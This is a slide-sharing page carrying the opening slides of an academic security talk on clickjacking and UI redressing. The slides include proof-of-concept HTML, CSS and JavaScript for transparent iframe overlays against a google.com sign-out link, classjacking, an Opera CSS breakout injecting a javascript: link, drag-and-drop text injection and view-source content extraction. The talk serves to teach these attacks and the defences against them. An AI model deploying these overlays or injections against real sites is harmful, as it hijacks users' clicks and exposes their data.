User Experience & Lean Startup
User Experience & Lean StartupUser Experience & Lean Startup
User Experience & Lean StartupLane Goldstone
 
The Top 20 Cyberattacks on Industrial Control Systems
The Top 20 Cyberattacks on Industrial Control SystemsThe Top 20 Cyberattacks on Industrial Control Systems
The Top 20 Cyberattacks on Industrial Control SystemsMuhammad FAHAD
 
Hacker Halted Miami , USA 2010
Hacker Halted Miami , USA 2010Hacker Halted Miami , USA 2010
Hacker Halted Miami , USA 2010Aditya K Sood
 
從技術角度看 RWD - Technical Approaches to RWD
從技術角度看 RWD - Technical Approaches to RWD從技術角度看 RWD - Technical Approaches to RWD
從技術角度看 RWD - Technical Approaches to RWDChris Wu
 
Clickjacking Attack: Hijacking User’s Click
Clickjacking Attack: Hijacking User’s ClickClickjacking Attack: Hijacking User’s Click
Clickjacking Attack: Hijacking User’s ClickEswar Publications
 
Navigating the User Experience Strategies for Successful Web Design.pdf
Navigating the User Experience Strategies for Successful Web Design.pdfNavigating the User Experience Strategies for Successful Web Design.pdf
Navigating the User Experience Strategies for Successful Web Design.pdfBitCot
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaperDaniel Tumser
 
Stocktwits & Responsive Web Design, social network meets flexible framework
Stocktwits & Responsive Web Design, social network meets flexible frameworkStocktwits & Responsive Web Design, social network meets flexible framework
Stocktwits & Responsive Web Design, social network meets flexible frameworkJohn Strott
 
Tablet and Slate Development with Silverlight
Tablet and Slate Development with SilverlightTablet and Slate Development with Silverlight
Tablet and Slate Development with SilverlightJeremy Likness
 
Modelling the User Interface
Modelling the User InterfaceModelling the User Interface
Modelling the User InterfacePedro J. Molina
 
Mobile UI Design Patterns
Mobile UI Design PatternsMobile UI Design Patterns
Mobile UI Design Patternsdanhermes
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection Abhishek Singh
 

Semelhante a Marcus Niemietz - UI Redressing and Clickjacking About click fraud and data theft (20)

Paper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking AttacksPaper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking Attacks
 
By the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareBy the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in Software
 
By the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareBy the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in Software
 
UI Redressing
UI RedressingUI Redressing
UI Redressing
 
Koopman Prize Presentation
Koopman Prize PresentationKoopman Prize Presentation
Koopman Prize Presentation
 
User Experience & Lean Startup
User Experience & Lean StartupUser Experience & Lean Startup
User Experience & Lean Startup
 
The Top 20 Cyberattacks on Industrial Control Systems
The Top 20 Cyberattacks on Industrial Control SystemsThe Top 20 Cyberattacks on Industrial Control Systems
The Top 20 Cyberattacks on Industrial Control Systems
 
Hacker Halted Miami , USA 2010
Hacker Halted Miami , USA 2010Hacker Halted Miami , USA 2010
Hacker Halted Miami , USA 2010
 
從技術角度看 RWD - Technical Approaches to RWD
從技術角度看 RWD - Technical Approaches to RWD從技術角度看 RWD - Technical Approaches to RWD
從技術角度看 RWD - Technical Approaches to RWD
 
Clickjacking Attack: Hijacking User’s Click
Clickjacking Attack: Hijacking User’s ClickClickjacking Attack: Hijacking User’s Click
Clickjacking Attack: Hijacking User’s Click
 
Navigating the User Experience Strategies for Successful Web Design.pdf
Navigating the User Experience Strategies for Successful Web Design.pdfNavigating the User Experience Strategies for Successful Web Design.pdf
Navigating the User Experience Strategies for Successful Web Design.pdf
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
Stocktwits & Responsive Web Design, social network meets flexible framework
Stocktwits & Responsive Web Design, social network meets flexible frameworkStocktwits & Responsive Web Design, social network meets flexible framework
Stocktwits & Responsive Web Design, social network meets flexible framework
 
The Science behind Good UIs and UXs
The Science behind Good UIs and UXsThe Science behind Good UIs and UXs
The Science behind Good UIs and UXs
 
Tablet and Slate Development with Silverlight
Tablet and Slate Development with SilverlightTablet and Slate Development with Silverlight
Tablet and Slate Development with Silverlight
 
APT Webinar
APT WebinarAPT Webinar
APT Webinar
 
Modelling the User Interface
Modelling the User InterfaceModelling the User Interface
Modelling the User Interface
 
Mobile UI Design Patterns
Mobile UI Design PatternsMobile UI Design Patterns
Mobile UI Design Patterns
 
Data Leakage Prevention - K. K. Mookhey
Data Leakage Prevention - K. K. MookheyData Leakage Prevention - K. K. Mookhey
Data Leakage Prevention - K. K. Mookhey
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 

Mais de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Mais de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 

Último (20)

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 

Marcus Niemietz - UI Redressing and Clickjacking About click fraud and data theft

  • 1. Introduction Attack vectors Counteractive measures Conclusion and outlook UI Redressing and Clickjacking: About click fraud and data theft Marcus Niemietz marcus.niemietz@rub.de Ruhr-University Bochum Chair for Network and Data Security 25th of November 2011 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 2. Introduction Attack vectors Counteractive measures Conclusion and outlook Short and crisp details about me Studying “IT-Security/Information Technology”, RUB “Computer Science”, Distance University Hagen B.Sc. in “IT-Security/Information Technology” Books Authentication Web Pages with Selenium ≥Feb. 2012: Clickjacking und UI-Redressing International speaker Work: RUB, Pixelboxx, ISP and IT-Security, Freelancer (trainings, penetration tests) Twitter: @mniemietz Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 3. Introduction Attack vectors Counteractive measures Conclusion and outlook Contents 1 Introduction UI redressing Clickjacking 2 Attack vectors UI redressing Round up Clickjacking Tool 3 Counteractive measures Frame busting Busting frame busting Clickjacking statistics 4 Conclusion and outlook Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 4. Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Introduction Google Inc. can generate a profit of over $8.5 billion in 2010 Interesting for commercial companies to offer web applications shopping banking share status messages New attacks available that can bypass existing protection mechanisms CSRF token via Clickjacking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 5. Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Introduction Oh no! Why Clickjacking, why again? Because there is more in it! Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 6. Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook UI redressing Adjust the look and/or behavior of a web page UI redressing Clickjacking Strokejacking Text injection by drag-and-drop Content extraction Pop-up blocker bypass SVG masking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 7. Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Clickjacking A known issue since 2002 Officially introduced by Hansen & Grossman in 2008 Clickjacking ⊂ UI redressing Cursorjacking Filejacking, Cookiejacking Likejacking, Sharejacking Eventjacking, Classjacking Tapjacking, Tabnapping Adobe Flash Player attacks Combinations with CSRF, XSS, CSS Clickjacking ⇔ Classic clickjacking = UI redressing Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 8. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Attack vectors Classic clickjacking Advanced attacks Clickjacking and XSS Clickjacking and CSS Strokejacking Text injection by drag-and-drop Content extraction Cursorjacking SVG masking What an attacker can do Clickjacking tool Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 9. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking Practical example Clickjacking on the google.com “Sign out” link Three files required inner.html 1 < iframe src =" http :// www . google . com " width ="2000" height ="2000" scrolling =" no " frameborder =" none " > 2 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 10. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 11. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking clickjacking.html 1 < iframe id =" inner " src =" inner . html " width ="2005" height ="290" scrolling =" no " frameborder =" none " > </ iframe > 2 < style type =" text / css " > <! - - 3 # inner { position : absolute ; left : -1955 px ; top : -14 px ;} 4 // - - > </ style > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 12. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking trustedPage.html 1 <h1 > www . nds . rub . de </ h1 > 2 < form action =" http :// www . nds . rub . de " > 3 < input type =" submit " value =" Go " > 4 </ form > 5 6 < iframe id =" clickjacking " src =" clickjacking . html " width ="50" height ="300" scrolling =" no " frameborder =" none " > 7 </ iframe > 8 < style type =" text / css " > <! - - 9 # clickjacking { position : absolute ; left :7 px ; top :81 px ; opacity :0.0} 10 // - - > </ style > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 13. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking 1 “inner.html”: Frame “google.com” (2000x2000px) 2 “clickjacking.html”: Shift the iframe with “src=inner.html” to the left 3 “trustedPage.html”: Place a transparent iframe with “src=clickjacking.html” over the “Go” button Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 14. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and XSS: Classjacking Makes use of the jQuery JavaScript Library Simplifies HTML event handling Truncated classjacking.html (Part 1/2) 1 < span class = foo > Some text </ span > 2 <a class = bar href =" http :// www . nds . rub . de " > 3 www . nds . rub . de 4 </a > 5 6 < script src =" http :// code . jquery . com / jquery -1.4.4. js " > 7 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 15. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and XSS: Classjacking Truncated classjacking.html (Part 2/2) 1 < script > 2 $ (" span . foo ") . click ( function () { 3 alert ( ’ foo ’) ; 4 $ (" a . bar ") . click () ; 5 }) ; 6 $ (" a . bar ") . click ( function () { 7 alert ( ’ bar ’) ; 8 location =" http :// www . example . org "; 9 }) ; 10 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 16. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and CSS: Whole-page clickjacking CSS offers the option to use attribute selectors to select elements with specific attributes CSS attribute selector code 1 a [ href = http :// www . example . org /] { 2 font - weight : bold ; 3 } Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 17. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and CSS: Whole-page clickjacking Opera allows for breaking out of attribute selectors Opera 11: -o-link applies for <a> tags Whole-page clickjacking code 1 < style > 2 p [ foo = bar {}*{ - o - link : ’ javascript : alert (1) ’}{}*{ - o - link - source : current }]{ 3 color : red ; 4 } 5 </ style > “-o-link-source” is used to specify the source anchor for the element with the value “current” to use the current value of “-o-link” Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 18. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Strokejacking Introduced by Michal Zalewski in 2010 Uses the focus functionality An iframe (src=“google.com”) together with a text field The web browser has to choose between the “iframe” and “input” tag Word “opportunity” to provide a human authentication service “p”, “o”, “r” and “n” Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 19. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Text injection by drag-and-drop Data can be dragged across a domain No need to care about the SOP dragAndDrop.html 1 < div draggable =" true " ondragstart =" event . dataTransfer . setData ( t e x t / p l a i n , malicious c o d e ) ;" > 2 <h1 > Drop me </ h1 > 3 </ div > 4 < iframe src =" dr agAndD ropIfr ame . html " style =" border :1 px solid ;" frameborder =" yes " > 5 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 20. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Content extraction contentExtraction.html 1 < iframe src =" view - source : http :// www . nds . rub . de / chair / news /" frameborder ="0" style =" width :400 px ; height :180 px " > 2 </ iframe > 3 < textarea type =" text " cols ="50" rows ="10" > 4 </ textarea > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
